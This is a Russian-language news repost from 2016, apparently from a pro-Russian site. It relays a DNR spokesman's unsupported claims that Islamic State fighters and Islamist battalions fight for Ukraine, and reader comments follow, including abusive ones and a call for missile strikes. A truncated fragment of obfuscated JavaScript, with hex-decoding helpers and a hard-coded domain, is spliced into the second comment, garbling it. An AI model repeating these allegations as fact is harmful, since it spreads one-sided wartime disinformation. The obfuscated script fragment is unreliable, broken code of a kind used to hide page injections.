Рубрика: » » На стороне киевской хунты воюют боевики ИГ, заявляют в ДНР

На стороне киевской хунты воюют боевики ИГ, заявляют в ДНР

В самопровозглашенной Донецкой народной республики сообщают о десятках исламистских бандформирований, которые воюют на Донбассе на стороне армии Украины.

"После активизации взаимоотношений Киева с Анкарой отмечается увеличение притока радикальных исламистов в зону так называемой АТО. В зоне карательной операции на стороне украинской армии, согласно данным разведки ВС ДНР, в настоящее время воюет уже около 30 таких бандформирований. Часть бандитов находится в международном розыске за терроризм", - заявил в среду на брифинге заместитель командующего корпусом Минобороны ДНР Эдуард Басурин.

В качестве примера он привел "радикально исламский террористический батальон имени Джохара Дудаева составом до 300 боевиков, который для легитимизации своего присутствия на Донбассе включен в состав вооруженного формирования подразделения МВД "Золотые ворота".

"Террористические бандформирования, действующие на стороне правительственных войск Украины, распределены по следующим населенным пунктам: Дзержинск, Артемовск, Авдеевка и Широкино. По нашим данным, Украиной также оказывается посильная помощь "Исламскому государству" (запрещенная в РФ террористическая организация) в знак благодарности за поддержку террористическими организациями Афганистана, Ирака, Сирии, Турции силовой операции на Донбассе", - заявил Э.Басурин.

По его словам, на территории Украины уже существуют лагеря, в которых террористы готовят украинских националистов подрывать гражданские объекты, убивать мирных людей в общественных местах, проникать на военные объекты и взрывать себя вместе с военнослужащими противника.

"Особое внимание арабские учителя уделяют психологии и тактике ведения террористической войны. Также власти Украины закрывают глаза на тотальную вербовку украинской молодежи для участия в вооруженном конфликте против правительственных войск в Сирии и в других горячих точках. Например, недавно в Иордании совершил подрыв смертник, учившийся в Харькове. Не исключается совершение ими терактов в городах Европы", - отметил представитель Минобороны ДНР.

Как отметил он, все чаще разведка отмечает факты продажи военными чиновниками Украины оружия из зоны АТО террористам в Сирию и Ирак.
 
http://interfax-religion.ru/?act=news&div=61582
14 января 2016   Просмотров: 3079   
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь. Мы рекомендуем Вам зарегистрироваться либо зайти на сайт под своим именем.
Комментарии (3)
14 января 2016 09:14
ну что ж,тогда у России ,можно сказать,развязываються руки ....Если Россия бороться с ИГ ,значить где они появляются там их нужно мочить,по логике,итак можно пускать ракеты по банды формированиям .... если конечно следовать логике борьбы с террором ....
        1
14 января 2016 15:42

А кто такие ВС ДНР? А это уголовники и бандиты, террористы поддерживаемые руководстврм РФ. Так в чем величие России, ее историческое предназначение , если  не только руководство РФ но и большинство населения поддерживает банальных головорезов в Донбассе, на законной территори Украины. Стыдно должно быть вам россияне...

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "3rm.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

        2
15 января 2016 17:26

Цитата: belarus67
А кто такие ВС ДНР? А это уголовники и бандиты, террористы поддерживаемые руководстврм РФ. ... большинство населения поддерживает банальных головорезов в Донбассе,... Стыдно должно быть вам россияне...

 

Настоящий беларус, (он и больш. украинцев - русичи) такого никогда не скажет, потому что он знает где заканчивается бандеровско-нацистская ЛОЖЬ и начинается битва за правду.

 

Belarus67, ТЫ ХАВАЛО СВОЁ ЗАХЛОПНИ про простых ополченцев, трудяг. В основном там составляет костяк местное население. Угловники есть, но многие из них стали на правильный путь сплотившись вместе против геноцида мирного населения. Конечно есть и моральные уроды, которые спаскудились и творят преступления.

 

Я говорю сейчас за честных порядочных ополченцев. А те мрази, что крышуются предателями Русского мира, такими как Захарченко , Плотницкий, Пушилин, пр., то ты ФИЛЬТРУЙ понимание где Истина, а где откровенное уродование этой Истины.

 

Тебе уже 48 лет и ты реально не понимаешь что произошло тогда в 2014? Как смеешь сеять смущение и ложь в умах и сердцах людей?

ТЫ БЫЛ В ПЕКЛЕ ЗА ИСТИНУ? ТЕБЕ ОТРЫВАЛО РУКИ-НОГИ И ТЕРЯЛ ЛИ ТОВАРИЩЕЙ ЗА ИСТИНУ?  Посмотри историю ополченца Александра Филяева 33-х лет (погугли) и потом сделай себе выводы.

        3